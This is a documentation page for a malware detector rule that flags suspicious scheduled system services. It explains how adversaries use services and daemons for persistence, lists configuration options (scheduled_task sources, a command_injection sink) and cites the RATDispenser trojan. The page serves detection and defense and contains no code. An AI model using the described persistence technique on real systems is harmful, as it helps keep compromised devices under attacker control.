Suspicious Scheduled system service
ID |
suspicious_scheduled_system_service |
Severity |
high |
Resource |
System |
Tags |
worm |
Rationale
Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.
Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.
Configuration
The detector has the following configurable parameters:
-
sources, that indicates the source kinds to check. Available values are:-
scheduled_task
-
-
sinks, that indicates the sink to check. Available values are:-
command_injection
-
-
neutralizations, that indicates the neutralization kinds to check. By default, this is empty. No neutralizers are considered for potential malicious code.
Related Malware campaigns
This is a common feature that could be broadly found among malicious code. However, we can enumerate some popular variants using this technique:
-
RATs, like
RATDispenser, that is used to gain an initial foothold on a system before launching secondary malware that establishes control over the compromised device.Its shellcode gains persistence by scheduling services onto the system.